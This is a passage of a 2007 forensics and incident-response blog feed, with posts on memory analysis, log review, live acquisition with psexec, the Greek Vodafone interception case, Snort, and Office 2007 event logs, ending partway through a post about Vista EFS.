/&gt;There's good stuff there for forensic folks too.  Things like &lt;a href="http://whois.domaintools.com"&gt;http://whois.domaintools.com&lt;/a&gt; that some people don't know about. . . just good stuff.&lt;br /&gt;&lt;br /&gt;&lt;embed style="width:400px; height:326px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=8220256903673801959&amp;hl=en" flashvars=""&gt; &lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;2.  When you do forensics on compromised systems, there is an inverse relationship between time and evidence; that is, the greater the time between compromise and examination, the evidence decreases.&lt;br /&gt;&lt;br /&gt;A couple of files that I've found to be useful in exams - memory.dmp and drwatson.log (it might be drwtsn.log. . .).  I'm going to do a do a longer post on this later on, but in short, attacker's tools often cause applications to crash.  This is an easy way to find out how the attack was accomplished.  WinDbg is your friend here.  More later.&lt;br /&gt;&lt;br /&gt;3.  I'll be posting a couple of scripts in the near future.  One will extract event logs from a remote computer, and the other gets services from a remote computer (similar to sc \\remote query), but it also extracts the PID and the path to the executable and command line.&lt;br /&gt;&lt;br /&gt;I've been *really* busy in the last couple of months, between work and home life, but I'll continue to post when I've got something that I think is useful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-7980558258049578718?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/7980558258049578718/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=7980558258049578718' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7980558258049578718'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7980558258049578718'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/10/couple-of-toughts-and-things-to-come.html' title='A couple of toughts and things to come'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-7775409439344100509</id><published>2007-10-06T23:40:00.001Z</published><updated>2008-03-05T02:49:08.895Z</updated><title type='text'>Things that pain me</title><content type='html'>&lt;\begin rant&gt;It's been a really busy couple of months, so I haven't had much time to myself, but a couple of quick thoughts:&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;1. 5 Minutes a week isn't asking that much, is it?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I have a server that I manage - I've been putting in extra hours at work, but still somehow I manage to have 5 minutes a week to look at my logs.  I wrote a shell script that looks for things like failed logins, brute force attacks, successful logins, etcetera; why can't IT "Professionals" spend a little time doing the same thing?&lt;br /&gt;&lt;br /&gt;I'd challenge everyone to stop right here and take a look at the logs on the box that you are viewing this post from, or even better, a server that you manage - you'll learn more from five minutes of reading your own logs than you will from the rest of this blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;2.  Information security/assurance/warfare/technology/badgers are stupid &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Until artificial intelligence (AI) gets significantly better (read, not during the course of your career), there will be no substitute for people doing work to analyze the products that computers create.  There is, and there will be no appliance, no snort box, no grep expression, no program, no pretty graphic user interface that will be able to analyze data collected and conclude with a reasonable degree of certainty that something is amiss.  People on the other hand can infer and from those infrences determine the likely answer to questions.  Attackers are people, and as such are remarkably fluid and resilient in the face of adversity; that is, they can modify their behavior when confronted with new information or situations.  &lt;br /&gt;&lt;br /&gt;Computers by contrast, are rule based - if text == Attack! then drop packet - but if text == 0x41ttack, well. . .&lt;br /&gt;&lt;br /&gt;This is not to say that computers do not do some things better than people.  Data can be sorted and noise eliminated more quickly with them but people have to analyze the data. It's a waste of time to have IDS analysts unless you have an IDS, and it is a waste of time to have a IDS without an analyst.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;3.  Network engineers should consider layer 8 during design, and plan their security accordingly.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;People are distracted, stupid, ignorant or indifferent to policy.  Policy can prohibit me from visiting http://example.com, but someone won't get the word, or won't care if they do.  Policy without enforcement is a waste of time.&lt;br /&gt;&lt;br /&gt;The only way to secure a network is to build in security as the primary consideration.  Some people have come to view their ability to access the Internet as some inalienable right on par with the 4th Amendment to the Constitution* - and IT workers seem to have become both the customer service representatives for said access.  It's a sad state of affairs.  If your network policy is not governed by a deny all, permit by exception principle, you are owned.  Maybe not today, but you will be owned.  If you have a DAPBE rule set in place for your network environment, you'll still get owned, but it will be easier to clean up.&lt;br /&gt;&lt;br /&gt;People don't &lt;i&gt;need&lt;/i&gt; to have access to webmail, CNN, ESPN, &lt;a href="http://www.homestarrunner.com/sbemail1.html"&gt;Homestarrunner&lt;/a&gt; or &lt;a href="http://xkcd.com/257/"&gt;XKCD&lt;/a&gt; from work.  They want it, sure, and maybe some do need CNN, but who can tell me of a blacklist that will prevent users from going to all of say, the &lt;a href="http://www.google.com/search?num=100&amp;hl=en&amp;newwindow=1&amp;safe=off&amp;q=intext%3A%22v1agra%22+inurl%3Ablogspot.com&amp;btnG=Search"&gt;malware sites that are hosted by blogger&lt;/a&gt;?  I'm guessing that there isn't one.&lt;br /&gt;&lt;br /&gt;3.  When you say, "We need to educate the users." I want you to stop breathing my air.&lt;br /&gt;&lt;br /&gt;User education is valuable, but only when it's actually education.  Education is not the bi-annual, "click here to click through" our security training.  You are wasting your money (ok, granted, this was probably some &lt;a href="http://en.wikipedia.org/wiki/Federal_Information_Security_Management_Act_of_2002"&gt;bureaucrat's idea&lt;/a&gt; of what security training should entail) and it's a waste of energy.  Spend your budget on things that work - and if you've got extra time and money at the end of the year, then you can worry about user education.  This also means that I'll be less likely to garrote you in a server room.&lt;\rant&gt;&lt;br /&gt;&lt;br /&gt;*The Fourth Amendment to the Constitution of United States guarantees the right of persons to be secure from unreasonable searches/seizures by the Government.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-7775409439344100509?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/7775409439344100509/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=7775409439344100509' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7775409439344100509'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/7775409439344100509'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/10/things-that-pain-me.html' title='Things that pain me'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1243693522849249058</id><published>2007-09-02T19:28:00.000Z</published><updated>2007-09-02T19:39:17.434Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Legal Decisions'/><category scheme='http://www.blogger.com/atom/ns#' term='RAM'/><title type='text'>Order on contents of RAM upheld</title><content type='html'>I previously wrote about a &lt;a href="http://breach-inv.blogspot.com/2007/06/ram-and-u-s-courts.html"&gt;California Magistrate's decision that the contents of RAM are discoverable&lt;/a&gt;.  It seems that the order withstood appeal to the District Court.  &lt;a href="http://ralphlosey.files.wordpress.com/2007/08/case-columbiaaffirmed-o1183212.pdf"&gt;The full decision is here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Interesting.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1243693522849249058?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1243693522849249058/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1243693522849249058' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1243693522849249058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1243693522849249058'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/09/order-on-contents-of-ram-upheld.html' title='Order on contents of RAM upheld'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-8130051962579275357</id><published>2007-08-14T00:55:00.000Z</published><updated>2007-08-14T21:14:36.255Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='&quot;net use&quot;'/><title type='text'>I am the CEO of Fantasy Land</title><content type='html'>There's been a dearth of posts of late due to the latest addition to the household - the 9 pound, 10 ounce kind that is. . .&lt;br /&gt;&lt;br /&gt;Between Kid V.2.0 and l337 h4x04s, I haven't had much time to post, but rynhere&lt;a href="https://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1903388692540715613"&gt; breezed by&lt;/a&gt; with a few comments.  I've edited them for brevity's sake, but since he keeps coming back for the answer, I figured I'd turn this into a post (being the CEO of Fantasy Land does have it's privileges).  &lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;"why would anyone. . . [grab a password from memory] from a running and logged in computer?" &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Bill: Well, I thought it was kind of obvious, but I've found it useful to have passwords ;-).&lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;Um, I'm sorry but [PGP ensures] that lost laptops (which are presumably turned off) do not pose a threat as the data is encrypted. &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Bill: I agree that PGP does mitigate the risk of data loss, but that was not the point.&lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;Is this "defeat" intended to describe how you would take a turned off laptop and defeat the password? &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Bill: No.&lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;I didn't see any mention of it beyond the obvious of brute force...good luck on that. &lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Bill: Actually, there are several products out there that will do just that &lt;a href="http://www.accessdata.com"&gt;Accessdata's PRTK and DNA&lt;/a&gt; come to mind.&lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;However, if you have a running computer that has been logged in and is in the windows interface, then let me give you the 1 step method of getting a copy of the data to run forensics against all day long. It's called hooking up a USB drive and downloading the meaningful contents of the native drive.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Bill: Leet!&lt;br /&gt;&lt;br /&gt;rynhere: &lt;i&gt;If your trying to obtain forensic information from the box however, as this article seems to illustrate; I'd like to understand how it is that you ask, (in your kindest, big-brother-is-watching sort of way) for this person to log into WDE and the network for you so that you can take their computer for the next 30 minutes to reverse engineer this password. Riiiight. Tell you what, if you can get someone to give you a logged in and running computer, then one of two things is the case,&lt;br /&gt;&lt;br /&gt;1. Your the CEO of fantasy land.&lt;br /&gt;2. Your in the wrong profession because you can clearly sell water to a drowning man. Go find your calling in life as a salesperson instead of geeking out on reverse engineering passwords to a running, unencrypted (once you've authenticated to WDE, the drive "appears" as unencrypted) box.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Ok, now to the point.  If you are going to image memory over the network, there's a number of ways get the memory.  If you have administrative rights on the box, you can  use psexec to get a command prompt on the target's computer, then "net use" back to the drive under your control to execute the tools working as the administrator on your target's box.  There is no "pretty" way to do a live acquisition, you are going to make some changes no matter what method you choose, but it's nice to have more than one tool in your toolbox.&lt;br /&gt;&lt;br /&gt;Oh, and I have asked for and received a number of passwords to computers and I didn't even need to &lt;a href="http://news.bbc.co.uk/1/hi/technology/3639679.stm"&gt;give the users chocolate&lt;/a&gt; to get them.  You just never know until you ask. . .&lt;br /&gt;&lt;br /&gt;That's all your CEO has time for right now. . .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-8130051962579275357?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/8130051962579275357/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=8130051962579275357' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/8130051962579275357'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/8130051962579275357'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/08/i-am-ceo-of-fantasy-land.html' title='I am the CEO of Fantasy Land'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-5824972328236109516</id><published>2007-07-19T18:05:00.000Z</published><updated>2007-07-21T19:17:00.237Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='best practices'/><category scheme='http://www.blogger.com/atom/ns#' term='not closing the door on attackers'/><category scheme='http://www.blogger.com/atom/ns#' term='intrusions'/><title type='text'>You just got 0wned.  Now what?</title><content type='html'>Imagine that you are arriving at your office and you look through the window.  Inside the building you can see someone burglarizing the building.  What would you do?&lt;br /&gt;&lt;br /&gt;You have a few options, you could (1) call the police; (2) you could ignore the burglary and go get a cafe' latte double mocha espresso and hope that the burglar leaves before anyone sees him; (3) or you could open the door to the office, and shout, "Hey! Get out!", wait for the burglar to leave.  &lt;br /&gt;&lt;br /&gt;In the real world, people routinely choose the first option.  They do not run the burglar out of the house and then lock the door to preserve the scene before the police arrive, but for some reason, when it comes to cyber-crime, almost everyone chooses the third option.  The burglar is long gone by the time the investigation starts.  Evidence has been walked over, looked over, deleted and operating systems re-installed.&lt;br /&gt;&lt;br /&gt;The "information assurance" community does a lousy job of ensuring that intrusions are handled appropriately.  In my experience there is a community wide knee jerk reaction to intrusions that starts with looking at logs (rather than preserving them), moves into damage control (patching and re-instllation) and then, as an afterthought, calling in people who are qualified to respond to the incident.  &lt;a href="http://windowsir.blogspot.com"&gt;Harlan Carvey&lt;/a&gt; wrote recently that he had only conducted two live acquisitions for clients, and both of those were &lt;i&gt;after&lt;/i&gt; operating systems were reinstalled, so I assume that my experience is not unique.&lt;br /&gt;&lt;br /&gt;This is usually a response based on emotion, not logic.  I know that I'm largely preaching to the choir here, but hopefully someone will wander in during this sermon - so here's what you need to do if you have been hacked:&lt;br /&gt;&lt;br /&gt;1.  &lt;a href="http://en.wikipedia.org/wiki/The_Hitchhiker's_Guide_to_the_Galaxy"&gt;Don't panic&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;2.  Call someone qualified to investigate the incident.&lt;br /&gt;&lt;br /&gt;3.  Let the investigators investigate, image, analyze what's happen(ing/ed).&lt;br /&gt;&lt;br /&gt;4.  Develop a plan that will allow you to mitigate damage, determine the extent of the intrusion, catch the bad guy with your incident responders/law enforcement.&lt;br /&gt;&lt;br /&gt;5. Implement the plan.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-5824972328236109516?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/5824972328236109516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=5824972328236109516' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5824972328236109516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/5824972328236109516'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/07/you-just-got-0wned-now-what.html' title='You just got 0wned.  Now what?'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1146895905754592616</id><published>2007-07-06T13:51:00.000Z</published><updated>2007-07-07T11:02:08.518Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Event ID'/><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><title type='text'>Vista event IDs</title><content type='html'>An interesting note on Vista event logs in &lt;a href="http://blogs.msdn.com/ericfitz/archive/2007/04/18/vista-security-events-get-noticed.aspx"&gt;Eric Fitzgerald's blog&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;He notes that event log IDs in Vista are "old" event id + 4096.  There is also an explanation as to the reasoning behind using 4096 (as opposed to say, adding 1000 and keeping things simple).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-1146895905754592616?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/1146895905754592616/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=1146895905754592616' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1146895905754592616'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/1146895905754592616'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/07/vista-event-ids.html' title='Vista event IDs'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-6635029542270226396</id><published>2007-07-05T01:15:00.000Z</published><updated>2007-07-05T02:38:16.451Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='best practices'/><category scheme='http://www.blogger.com/atom/ns#' term='not closing the door on attackers'/><category scheme='http://www.blogger.com/atom/ns#' term='Cell hack'/><title type='text'>Moxie, Best practice and the Greek cell-hack</title><content type='html'>&lt;a href="http://spectrum.ieee.org/jul07/5280"&gt;IEEE's Spectrum has a very good article&lt;/a&gt; in this month's edition that is worth taking the time to read.  The article discusses the 2004-2005 hacking of Vodaphone.  During the intrusion, the attackers were able to intercept the cellular phone calls of a number of people in Greece.  People like the Greek Prime Minister (how do you say "ouch" in Greek?) and senior government officials .&lt;br /&gt;&lt;br /&gt;From the article (emphasis mine):  &lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;[W]e can only speculate about various approaches that the intruders may have followed to carry out their attack. That's because key material has been lost or was never collected. For instance, in July 2005, &lt;span style="font-weight:bold;"&gt;while the investigation was taking place, Vodafone upgraded two of the three servers&lt;/span&gt; used for accessing the exchange management system. This upgrade &lt;span style="font-weight:bold;"&gt;wiped out the access logs&lt;/span&gt; and, contrary to company policy, &lt;span style="font-weight:bold;"&gt;no backups&lt;/span&gt; were retained. Some time later a six‑month retention period for visitor sign-in books lapsed, and Vodafone destroyed the books corresponding to the period where the rogue software was modified. . .&lt;br /&gt;&lt;br /&gt;[D]ue to a paucity of storage space in the exchange's management systems, the logs were retained for only five days, because Vodafone considers billing data, which competes for the same space, a lot more important. &lt;span style="font-weight:bold;"&gt;Most crucially, Vodafone's deactivation of the rogue software on 7 March 2005 almost certainly alerted the conspirators, giving them a chance to switch off the shadow phones.&lt;/span&gt; As a result investigators missed the opportunity of triangulating the location of the shadow phones and catching the perpetrators in the act.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The all to frequent reaction of system administrators and managers to pull the plug on intruders.  &lt;br /&gt;&lt;br /&gt;Now I'll grant you that I am drastically oversimplifying the matter - I'm sure that having your government's head of state, Naval general staff and others played a significant role in the decision, but this response is not containment - it's often a knee jerk reaction to perceived liability.  If a hacker has been in your system for a month, a week, or a year, is watching him for a day or two so you can determine the extentent of the penetration a bad idea?  If you were investigating this incident, would you rather have a couple of days where the hackers were inside your system where you could track (and possibly identify them) or would you rather just close the door before you had figured out how they got in in the first place?  &lt;br /&gt;&lt;br /&gt;It is like being asked to choose between gathering volatile data while a system is still running and yanking the cord out of the wall - I'd choose the former every time.  In an intrusion case, I'd argue that not gathering volatile data is tantamount to malpractice; and if presented with the opportunity to determine the full extent of an intrusion, you ought to take the opportunity, or you risk the same argument being applied to your actions. &lt;br /&gt;&lt;br /&gt;Best practice in intrusions is to contain the intrusion so that the attacker is isolated, but allowed to continue to access the systems that he's accessing.  If there are data that you can not allow out (classified or personally identifying information come to mind), part of the containment strategy should be to come up with either bogus data or a reason why the data can no longer be reached (i.e. "The server crashed, but we're working on it.").  There are going to be cases where this will not be realistic, but it should be the starting point for any intrusion investigation.  You will learn a lot more, a lot faster this way.  This more moxie than just cutting the attacker off, but in the long run it is better for the investigation and ultimately for the victim to know all that there is to know about the intrusion by observing a "live patient" than would ever be discovered through an autopsy of a dead one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-6635029542270226396?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/6635029542270226396/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=6635029542270226396' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6635029542270226396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/6635029542270226396'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/07/moxie-best-practice-and-greek-cell-hack.html' title='Moxie, Best practice and the Greek cell-hack'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-3887542557769282130</id><published>2007-06-30T13:36:00.000Z</published><updated>2007-07-03T00:29:07.856Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='Snort'/><category scheme='http://www.blogger.com/atom/ns#' term='IT Appliance Fixation'/><title type='text'>Snort and the IT Appliance Fixation</title><content type='html'>I'm a huge fan of &lt;a href="http://www.snort.org"&gt;Snort&lt;/a&gt;, but I am more than a little dismayed at the lack of acceptance that it has in the community.  Now I know that most people who read this blog will think that I have lost my mind, but hear me out.&lt;br /&gt;&lt;br /&gt;There is a mindset that I see with IT people that goes something like this:&lt;br /&gt;&lt;br /&gt;Manager: "We have a problem.  Our enterprise isn't covered by IDS sensors."&lt;br /&gt;IT guy:  "I know just what we need.  There's a vendor that has an appliance . . ."&lt;br /&gt;Manager:  "Get me three bids."&lt;br /&gt;&lt;br /&gt;I call this the IT Appliance Fixation.  In my experience, the "typical" IT response to a problem is to buy a box that someone can hang on to the network.  The purchase is based largely on vendor advertising, sales pitches and the vendor's website.  The problem is, when it comes to intrusion detection, there is no better sensor than a good old snort box.  I will grant you that building a snort sensor takes time and writing/configuring snort rules takes time too, but what's the cost benefit ratio?  &lt;br /&gt;&lt;br /&gt;Assume that a Vendor supplied IDS will cost $50,000 just to purchase.  Factor in the time spent finding the right product.  Now consider that an organization could easily spend that time configuring a Snort sensor baseline image, and roll that out on computers that are past the end of their life cycle - see where I'm going?  Now factor in the open source nature of Snort's rule sets, and you could easily save money in implementation, and use the money to hire a decently paid IDS analyst.&lt;br /&gt;&lt;br /&gt;The bottom line here is that the best solution is not always the newest one, or one that comes with vendor support.  If you are in a position to do something useful on a network, it does not always have to cost money.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-3887542557769282130?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/3887542557769282130/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=3887542557769282130' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3887542557769282130'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3887542557769282130'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/snort-and-it-appliance-fixation.html' title='Snort and the IT Appliance Fixation'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-3459971478611406390</id><published>2007-06-29T19:53:00.000Z</published><updated>2007-06-30T02:58:26.298Z</updated><title type='text'>Office 2007 Event Logs</title><content type='html'>A coworker walked into my office today and asked if I'd take a look at a drive to see if I thought the former owner had tried to tamper with the contents.  After a little "pokin' 'round" I exported the event logs and opened up my event viewer to look at them when I noticed another log on my box.  Not the ones I'd exported, but a new event log that comes with a default installation of Office 2007.  So naturally, I discarded the investigation that I was supposed to be doing and began investigating what interested me.  My proclivity for doing things like this is the reason that my desk is a shambles, but that's a tale for a different day, on to the new event log! &lt;br /&gt;&lt;br /&gt;OSession.evt isn't incredibly interesting, but it might be useful in an examination.  Below there are two of the entries that I carved out. . .  You'll note that the application (Word) and the times are identified.  That might be useful in a case where time was an issue.&lt;br /&gt;&lt;br /&gt;I have not yet figured out what the active time entry is.  It does not appear to be something that would be associated with actually working in the program; the first entry below was me opening Word, putting in some text and then saving and closing the document - active time 0 seconds.  The second entry is from the first time I opened up Excel.  I'm not sure what I did there, but it was probably something to do with carving out a file and then opening it with Excel.  I have not found anything official that documents the log, so I would be interested in links to reliable documentation.&lt;br /&gt;&lt;br /&gt;I did not include everything from the log, but it appears on first blush to have all the same features that the "big 3" event logs have, so you can find times.  Times associated with log entries are the times that you exited the program, so an entry at 1345:00 hours that was 901 seconds long would have started at 1329:59 hours.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style:italic;"&gt;ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 20 seconds with 0 seconds of active time.  This session ended normally.&lt;br /&gt;&lt;br /&gt;ID: 1, Application Name: Microsoft Office Excel, Application Version: 12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 172 seconds with 120 seconds of active time.  This session ended normally.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5808631531257292980-3459971478611406390?l=breach-inv.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://breach-inv.blogspot.com/feeds/3459971478611406390/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5808631531257292980&amp;postID=3459971478611406390' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3459971478611406390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5808631531257292980/posts/default/3459971478611406390'/><link rel='alternate' type='text/html' href='http://breach-inv.blogspot.com/2007/06/office-2007-event-logs.html' title='Office 2007 Event Logs'/><author><name>Bill</name><uri>http://www.blogger.com/profile/15956125660689343228</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5808631531257292980.post-1466359576072745363</id><published>2007-06-17T14:40:00.000Z</published><updated>2007-06-17T19:09:39.792Z</updated><category scheme='http://www.blogger.com/atom/ns#' term='EFS'/><category scheme='http://www.blogger.com/atom/ns#' term='Encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='Admin'/><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><category scheme='http://www.blogger.com/atom/ns#' term='system'/><title type='text'>Quickly Cracking EFS on Vista (and getting local admin rights too)</title><content type='html'>Kimmo Rousku has some &lt;a href="http://ict-tuki.fi/vistasec_eng/"&gt;interesting observations and a walk through&lt;/a&gt; on getting Administrator and/or System level rights on Vista through the use of a recovery CD.  One area that he mentions is that you can crack EFS encrypted files with this as well.&lt;br /&gt;&lt;br /&gt;I have not toyed with or analyzed Vista yet (except to try and help a coworker configure a static IP, which was 